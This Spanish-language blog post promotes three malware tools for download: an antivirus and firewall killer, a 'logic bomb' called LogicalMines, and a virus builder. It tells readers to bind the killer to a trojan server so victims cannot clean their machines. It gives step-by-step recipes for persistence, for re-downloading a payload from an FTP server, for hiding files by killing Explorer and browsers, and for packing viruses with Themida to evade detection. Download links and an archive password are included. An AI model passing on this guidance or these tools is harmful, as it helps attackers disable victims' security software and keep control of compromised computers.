AV-FIREWALL KILLER
Uno de los usarios del blog me envio un firewall killer que descargo del ares para que lo probara, sin querer lo abri en mi otra pc y me mato TODO lo que tenga que ver con seguridad, pero cuando digo todo es todo, explicitamente me desactivo el Nod32, el Kaspersky, el Norton, el Ad-Aware, el ccleaner, el System Mechanic, los firewall y mas, me baje varios programas para ver si me lo desactivaba y nada, lo encontraba al virus pero no lo podia borrar, lo intente borrar manualmente y tampoco pasaba nada..
Cuando quiero entrar a algun antivirus aparece un cartel como este:
Y los anti spyware funcionan mal, no escanean correctamente...
El archivo es detectado y pesa 714 kb, pero sirve para juntarlo con un server con algun binder como el rude surprise que es indetectable, o para cuando tienen una victima sin antivirus y la quieren conservar, sera muy dificil que se desinfecte.
Proximamente le hare algunas mejoras a este killer:
-Sera Indetectable
-Las victimas no podran ingresar a ninguna pagina web de seguridad informatica
-Se Reducira el tamaño
http://rapidshare.com/files/94285555/Disable_Windows_XP_Firewall_1.0.rar.html
LOGICALMINES V1.0
LogicalMines es una bomba lógica que te permite, al producirse uno o varios eventos ejecutar una o varias acciones de la lista siguiente:
Eventos:
-Al existir o al no existir cierto archivo
-Al estar corriendo o no estar corriendo cierto proceso
-Después de/durante cierto tiempo con el pc corriendo
-En cierta fecha/hora/dia de la semana
-Al teclear cierto texto
-Al existir una ventana con cierto título y estado(min,max...)
-Al conectarse a cierta ip y/o puerto
-Al cabo/hasta X reinicios
Acciones:
-Ejecutar/abrir archivo o url
-Eliminar archivo o carpeta
-Eliminar proceso
-Apagar/reiniciar el equipo
-Subir/bajar archivo
-Bajar archivo de url
Imagenes:
Algunas cosas útiles que se pueden hacer con el LogicalMines:
-Que un proceso no se pueda lanzar.
Creamos una mina de proceso especificando: taskmgr.exe
Creamos un detonador de procesos especificando: taskmgr.exe
-Que siempre exista cierto archivo en ejecución en nuestro pc.
Subimos el archivo a un ftp y creamos una mina de Urldownload hacia nuestro archivo
Creamos un detonador de no existencia de archivo que detone la mina de descarga del archivo
Creamos una mina de ejecución hacia nuestro archivo
Creamos un detonador que lance la mina de ejecución del archivo al no existir el proceso de nuestro archivo.
-Que nunca exista cierto archivo en nuestro pc
Creamos una mina de destrucción de proceso con el proceso del archivo
Creamos un detonador de destrucción de proceso al estar corriendo el proceso del archivo
Creamos una mina de eliminación de archivos y especificamos el archivo a eliminar
Creamos un detonador de existencia de archivo y ponemos el archivo concreto
-Que no encuentren nuestro archivo, ni con el navegador ni en el buscador de archivos de windows
Creamos una mina de destrucción de proceso que apunte a explorer.exe
Creamos un detonador de teclado que destruya el explorer.exe al escribir el nombre de nuestro archivo
Creamos una mina de destrucción de proceso que apunte a firefox.exe y otra para iexplore.exe
Creamos otro detonador de teclado para estos ultimos procesos.
-Que al entrar en google.es se ejecute cierto programa.
Creamos una mina de ejecución (asegurarse de que el programa solo permite una instancia del mismo)
Miramos cual es la ip de google, inicio--ejecutar--cmd.exe nslookup www.google.es
Creamos un detonador de conexión para que al existir la conexión a esa ip por el puerto 80 se lance la mina de ejecución
http://rapidshare.com/files/87708048/LogicalMines.zip.html
Contraseña: LogicalMines
TERABIT VIRUS MAKER 2.8 SE
Hoy dejo un poderoso creador de virus, el Terabit Virus Maker 2.8 se (la ultima version). Es muy facil de utilizar, y muy dañino.
Imagen de pantalla prinsipal:
PD: Cuando creen el virus no se olviden de pasarle el themida para hacerlo indetectable.
link fuera de servicio
|
